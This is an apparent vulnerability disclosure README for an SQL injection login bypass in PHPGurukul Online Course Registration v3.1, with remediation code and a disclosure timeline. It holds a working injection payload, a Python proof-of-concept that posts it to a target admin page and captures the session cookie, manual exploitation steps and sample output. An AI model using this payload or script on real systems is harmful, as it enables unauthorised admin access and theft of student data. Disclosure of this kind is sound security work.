Share
## https://sploitus.com/exploit?id=1155A3CB-07B0-51D3-AAD5-EABE7B54E29D
# CVE-2025-XXXX: Critical Authentication Bypass in PHPGurukul Online Course Registration v3.1

[![CVSS Score](https://img.shields.io/badge/CVSS-10.0%20CRITICAL-red)](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)
[![CWE](https://img.shields.io/badge/CWE-89-orange)](https://cwe.mitre.org/data/definitions/89.html)
[![Status](https://img.shields.io/badge/Status-Disclosed-green)](https://github.com)

## ๐Ÿ”ด Vulnerability Overview

**Severe SQL Injection vulnerability** in PHPGurukul Online Course Registration System v3.1 allows **unauthenticated attackers** to bypass authentication and gain **full administrative access** without valid credentials.

### Quick Facts

- **Vendor**: PHPGurukul
- **Product**: Online Course Registration System
- **Affected Version**: v3.1
- **Vulnerability Type**: SQL Injection (CWE-89) + Authentication Bypass (CWE-287)
- **CVSS v3.1 Score**: **10.0 CRITICAL**
- **CVE ID**: CVE-2025-XXXX *(pending assignment)*
- **Discovery Date**: November 21, 2025
- **Disclosure Date**: February 19, 2026 *(90-day responsible disclosure)*

## ๐ŸŽฏ Impact

### Attack Surface
- **Attack Vector**: Network (AV:N)
- **Attack Complexity**: Low (AC:L)
- **Privileges Required**: None (PR:N)
- **User Interaction**: None (UI:N)

### Consequences
- โœ… **Complete administrative access** without authentication
- โœ… **Full database access** to all student records
- โœ… **Data exfiltration** of personal information
- โœ… **Data manipulation** - modify/delete any records
- โœ… **Account takeover** - create new admin accounts
- โœ… **Remote Code Execution** via file upload (secondary vulnerability)

## ๐Ÿ” Technical Details

### Vulnerable Code

**File**: `/admin/index.php` (Lines 7-9)

```php
// VULNERABLE CODE
$username=$_POST['username'];
$password=md5($_POST['password']);
$query=mysqli_query($con,"SELECT * FROM admin WHERE username='$username' and password='$password'");
```

**Issue**: Direct concatenation of user input into SQL query without sanitization or prepared statements.

### SQL Injection Payload

```sql
Username: admin' OR '1'='1' -- 
Password: anything
```

**Query becomes**:
```sql
SELECT * FROM admin WHERE username='admin' OR '1'='1' -- ' and password='...'
```

**Result**: The `OR '1'='1'` condition is always true, and `--` comments out the password check, bypassing authentication completely.

## ๐Ÿ’ฃ Proof of Concept

### Automated Exploit Script

```python
#!/usr/bin/env python3
import requests

target = "http://[TARGET]/admin/index.php"
session = requests.Session()

# SQL Injection payload
payload = {
    "username": "admin' OR '1'='1' -- ",
    "password": "anything",
    "submit": "submit"
}

# Execute bypass
response = session.post(target, data=payload, allow_redirects=True)

if "change-password" in response.url:
    print(f"โœ“ Admin access obtained!")
    print(f"โœ“ Session: {session.cookies.get('PHPSESSID')}")
    print(f"โœ“ Admin panel: {response.url}")
else:
    print("โœ— Exploit failed")
```

### Manual Testing Steps

1. Navigate to: `http://[target]/admin/index.php`
2. Enter username: `admin' OR '1'='1' -- `
3. Enter any password
4. Click "Submit"
5. **Result**: Full admin access granted

## ๐Ÿ› ๏ธ Exploitation

Run the provided exploit script:

```bash
python generate_evidence.py
```

**Output**:
```
โœ“ HTTP Status: 200 OK
โœ“ Redirected to: change-password.php
โœ“ Session Cookie: PHPSESSID=9hjm2k9t36mc7dbfdh8572fjj2
โœ“ Admin Panel Access: manage-students.php (200 OK)
โœ“ Full administrative privileges obtained
```

## ๐Ÿ” Remediation

### Immediate Fix

Replace vulnerable code with **prepared statements**:

```php
// SECURE CODE
$username = $_POST['username'];
$password = md5($_POST['password']);

// Use prepared statement
$stmt = $con->prepare("SELECT * FROM admin WHERE username = ? LIMIT 1");
$stmt->bind_param("s", $username);
$stmt->execute();
$result = $stmt->get_result();

if($result->num_rows === 1) {
    $row = $result->fetch_assoc();
    if($row['password'] === $password) {
        // Successful login
        $_SESSION['aid'] = $row['id'];
        header("location:change-password.php");
        exit();
    }
}

// Failed login
echo "alert('Invalid credentials');";
```

### Additional Recommendations

1. **Input Validation**: Sanitize all user inputs
2. **Password Hashing**: Upgrade from MD5 to bcrypt/Argon2
3. **Rate Limiting**: Implement login attempt limits
4. **CSRF Protection**: Add CSRF tokens to forms
5. **Security Audit**: Review all database queries for similar vulnerabilities

## ๐Ÿ“Š Additional Vulnerabilities Found

During security assessment, **46 additional vulnerabilities** were discovered:

| ID | Vulnerability | Severity | CVSS |
|----|---------------|----------|------|
| CVE-2025-XXXX-2 | Public AJAX SQL Injection | CRITICAL | 9.8 |
| CVE-2025-XXXX-3 | Time-based SQL Injection | HIGH | 8.1 |
| CVE-2025-XXXX-4 | Unrestricted File Upload RCE | CRITICAL | 9.8 |
| CVE-2025-XXXX-5 | IDOR in Student Profiles | HIGH | 7.5 |

*Full vulnerability report available in `CVE_SUBMISSION_REPORT.md`*

## ๐Ÿ“ Repository Structure

```
.
โ”œโ”€โ”€ README.md                           # This file
โ”œโ”€โ”€ CVE_SUBMISSION_REPORT.md           # Complete technical report (10 CVE candidates)
โ”œโ”€โ”€ CVE_EVIDENCE_admin_bypass.txt      # Detailed exploitation evidence
โ”œโ”€โ”€ generate_evidence.py               # Automated PoC exploit script
โ”œโ”€โ”€ final_exploitation_test.py         # Full vulnerability validation suite
โ”œโ”€โ”€ VENDOR_NOTIFICATION_EMAIL.txt      # Responsible disclosure email
โ”œโ”€โ”€ VULNERABILIDADES_CONFIRMADAS.md    # White-box code analysis
โ””โ”€โ”€ ROADMAP_COMPLETO_CVE.md           # CVE submission guide

```

## โš–๏ธ Responsible Disclosure Timeline

- **November 21, 2025**: Vulnerability discovered
- **November 21, 2025**: Vendor notified (phpgurukul@gmail.com)
- **December 5, 2025**: Follow-up #1 (no response)
- **December 21, 2025**: Follow-up #2 (no response)
- **February 19, 2026**: **Public disclosure** (90 days - no patch released)
- **February 19, 2026**: CVE submission to MITRE

## ๐ŸŽ“ Affected Systems

### Confirmed Vulnerable
- PHPGurukul Online Course Registration System **v3.1**

### Potentially Vulnerable
- All versions prior to v3.1 (unpatched)
- Other PHPGurukul products using similar authentication patterns

### Download Source
- [PHPGurukul Official Website](https://phpgurukul.com/online-course-registration-system-using-php-and-mysql/)

## ๐Ÿšจ Disclaimer

This research was conducted:
- โœ… In a **controlled local environment**
- โœ… Following **responsible disclosure** practices
- โœ… With **no malicious intent**
- โœ… For **educational and security improvement purposes**
- โœ… Complying with **CVD (Coordinated Vulnerability Disclosure)** standards

**No production systems were accessed or harmed.**

## ๐Ÿ‘จโ€๐Ÿ’ป Author

**Security Researcher**
- GitHub: https://github.com/felipecsptbr/
- Email: felipecs20221@gmail.com
- Date: November 21, 2025

## ๐Ÿ“œ License

This research is published for **educational purposes** under responsible disclosure principles.

## ๐Ÿ”— References

- [MITRE CVE Program](https://cve.mitre.org/)
- [NVD - National Vulnerability Database](https://nvd.nist.gov/)
- [CWE-89: SQL Injection](https://cwe.mitre.org/data/definitions/89.html)
- [CWE-287: Improper Authentication](https://cwe.mitre.org/data/definitions/287.html)
- [CVSS v3.1 Calculator](https://www.first.org/cvss/calculator/3.1)
- [OWASP SQL Injection](https://owasp.org/www-community/attacks/SQL_Injection)

---

**โš ๏ธ WARNING**: This vulnerability allows complete system compromise. Update immediately or implement the provided security patch.

**CVE Status**: Pending MITRE assignment โ€ข **Severity**: CRITICAL โ€ข **Exploitability**: Trivial